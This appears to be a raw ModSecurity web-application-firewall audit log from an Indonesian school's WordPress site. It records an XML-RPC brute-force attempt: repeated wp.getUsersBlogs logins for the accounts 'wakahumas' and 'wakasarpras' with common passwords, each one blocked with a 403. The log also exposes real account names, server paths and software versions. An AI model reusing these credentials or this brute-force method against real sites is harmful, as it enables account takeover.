smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8d34a419-C-- wp.getUsersBlogs wakahumas rockyou --8d34a419-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d34a419-E-- --8d34a419-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072952663963 5551 (- - -) Stopwatch2: 1745072952663963 5551; combined=4102, p1=530, p2=3388, p3=0, p4=0, p5=110, sr=102, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d34a419-Z-- --39fa4e1a-A-- [19/Apr/2025:21:30:03 +0700] aAOza-vDiFC_ir7MDwb4UgAAAEU 103.236.140.4 54498 103.236.140.4 8181 --39fa4e1a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --39fa4e1a-C-- wp.getUsersBlogs wakahumas 1234%^&* --39fa4e1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39fa4e1a-E-- --39fa4e1a-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073003440862 5508 (- - -) Stopwatch2: 1745073003440862 5508; combined=4023, p1=414, p2=3343, p3=0, p4=0, p5=160, sr=70, sw=106, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39fa4e1a-Z-- --4ead8b32-A-- [19/Apr/2025:21:30:20 +0700] aAOzfA6cTFSgLAHl7PruwAAAABY 103.236.140.4 56206 103.236.140.4 8181 --4ead8b32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4ead8b32-C-- wp.getUsersBlogs wakahumas 123asdasd --4ead8b32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ead8b32-E-- --4ead8b32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073020183451 5068 (- - -) Stopwatch2: 1745073020183451 5068; combined=3761, p1=451, p2=3102, p3=0, p4=0, p5=122, sr=94, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ead8b32-Z-- --a07d4b60-A-- [19/Apr/2025:21:31:20 +0700] aAOzuHNa4dA2HllpK_OQ4wAAAIk 103.236.140.4 34172 103.236.140.4 8181 --a07d4b60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a07d4b60-C-- wp.getUsersBlogs wakahumas !@#123 --a07d4b60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a07d4b60-E-- --a07d4b60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073080445510 5552 (- - -) Stopwatch2: 1745073080445510 5552; combined=4001, p1=484, p2=3346, p3=0, p4=0, p5=102, sr=91, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a07d4b60-Z-- --76d89869-A-- [19/Apr/2025:21:32:22 +0700] aAOz9g6cTFSgLAHl7PrxzwAAABI 103.236.140.4 39910 103.236.140.4 8181 --76d89869-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --76d89869-C-- wp.getUsersBlogs wakahumas justin --76d89869-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76d89869-E-- --76d89869-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073142028248 4977 (- - -) Stopwatch2: 1745073142028248 4977; combined=3826, p1=460, p2=3125, p3=0, p4=0, p5=138, sr=86, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76d89869-Z-- --161a9157-A-- [19/Apr/2025:21:33:25 +0700] aAO0NQ6cTFSgLAHl7PrzHgAAAAc 103.236.140.4 45958 103.236.140.4 8181 --161a9157-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --161a9157-C-- wp.getUsersBlogs wakahumas 555555 --161a9157-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --161a9157-E-- --161a9157-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073205456829 5272 (- - -) Stopwatch2: 1745073205456829 5272; combined=3724, p1=479, p2=3060, p3=0, p4=0, p5=107, sr=90, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --161a9157-Z-- --fe0bd04e-A-- [19/Apr/2025:21:34:30 +0700] aAO0dkruoUXZj665VUEUKgAAAMk 103.236.140.4 52264 103.236.140.4 8181 --fe0bd04e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fe0bd04e-C-- wp.getUsersBlogs wakahumas qwerty1 --fe0bd04e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe0bd04e-E-- --fe0bd04e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073270021300 4765 (- - -) Stopwatch2: 1745073270021300 4765; combined=3449, p1=404, p2=2837, p3=0, p4=0, p5=119, sr=78, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe0bd04e-Z-- --6fe9434b-A-- [19/Apr/2025:21:35:35 +0700] aAO0t-vDiFC_ir7MDwb_kQAAAEg 103.236.140.4 58634 103.236.140.4 8181 --6fe9434b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6fe9434b-C-- wp.getUsersBlogs wakahumas 333333 --6fe9434b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fe9434b-E-- --6fe9434b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073335597046 6084 (- - -) Stopwatch2: 1745073335597046 6084; combined=4269, p1=542, p2=3506, p3=0, p4=0, p5=129, sr=94, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fe9434b-Z-- --736e776c-A-- [19/Apr/2025:21:36:39 +0700] aAO09-vDiFC_ir7MDwYBagAAAFY 103.236.140.4 36596 103.236.140.4 8181 --736e776c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --736e776c-C-- wp.getUsersBlogs wakasarpras wakasarpras1 --736e776c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --736e776c-E-- --736e776c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073399515843 4925 (- - -) Stopwatch2: 1745073399515843 4925; combined=3592, p1=389, p2=3023, p3=0, p4=0, p5=103, sr=79, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --736e776c-Z-- --a36ad94a-A-- [19/Apr/2025:21:37:39 +0700] aAO1M-vDiFC_ir7MDwYCvAAAAEQ 103.236.140.4 41866 103.236.140.4 8181 --a36ad94a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a36ad94a-C-- wp.getUsersBlogs wakasarpras 123123123 --a36ad94a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a36ad94a-E-- --a36ad94a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073459468989 5663 (- - -) Stopwatch2: 1745073459468989 5663; combined=4345, p1=527, p2=3476, p3=0, p4=0, p5=185, sr=88, sw=157, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a36ad94a-Z-- --8b518647-A-- [19/Apr/2025:21:38:39 +0700] aAO1b3Na4dA2HllpK_OZugAAAIA 103.236.140.4 47978 103.236.140.4 8181 --8b518647-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8b518647-C-- wp.getUsersBlogs wakasarpras abc123456 --8b518647-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b518647-E-- --8b518647-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073519567944 4880 (- - -) Stopwatch2: 1745073519567944 4880; combined=3777, p1=449, p2=3158, p3=0, p4=0, p5=104, sr=88, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b518647-Z-- --ffb5730d-A-- [19/Apr/2025:21:39:41 +0700] aAO1rUruoUXZj665VUEcKAAAAM8 103.236.140.4 54198 103.236.140.4 8181 --ffb5730d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ffb5730d-C-- wp.getUsersBlogs wakasarpras pass123 --ffb5730d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffb5730d-E-- --ffb5730d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073581668809 4355 (- - -) Stopwatch2: 1745073581668809 4355; combined=3089, p1=365, p2=2558, p3=0, p4=0, p5=95, sr=77, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffb5730d-Z-- --cd776d37-A-- [19/Apr/2025:21:40:47 +0700] aAO17-vDiFC_ir7MDwYHEAAAAE0 103.236.140.4 60792 103.236.140.4 8181 --cd776d37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cd776d37-C-- wp.getUsersBlogs wakasarpras 1111111 --cd776d37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd776d37-E-- --cd776d37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073647144096 4419 (- - -) Stopwatch2: 1745073647144096 4419; combined=3061, p1=379, p2=2461, p3=0, p4=0, p5=128, sr=69, sw=93, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd776d37-Z-- --7ea12c10-A-- [19/Apr/2025:21:41:52 +0700] aAO2MEruoUXZj665VUEf8gAAANg 103.236.140.4 39322 103.236.140.4 8181 --7ea12c10-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7ea12c10-C-- wp.getUsersBlogs wakasarpras 1234abcd --7ea12c10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ea12c10-E-- --7ea12c10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073712959667 4714 (- - -) Stopwatch2: 1745073712959667 4714; combined=3413, p1=392, p2=2827, p3=0, p4=0, p5=110, sr=79, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ea12c10-Z-- --02854a52-A-- [19/Apr/2025:21:43:01 +0700] aAO2dXNa4dA2HllpK_OfbAAAAI0 103.236.140.4 46150 103.236.140.4 8181 --02854a52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --02854a52-C-- wp.getUsersBlogs wakasarpras 123!@# --02854a52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02854a52-E-- --02854a52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073781599558 5248 (- - -) Stopwatch2: 1745073781599558 5248; combined=3796, p1=465, p2=3080, p3=0, p4=0, p5=146, sr=86, sw=105, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02854a52-Z-- --9f9d1a62-A-- [19/Apr/2025:21:44:04 +0700] aAO2tOvDiFC_ir7MDwYMoAAAAE4 103.236.140.4 52238 103.236.140.4 8181 --9f9d1a62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9f9d1a62-C-- wp.getUsersBlogs wakasarpras 1g2w3e4r --9f9d1a62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f9d1a62-E-- --9f9d1a62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
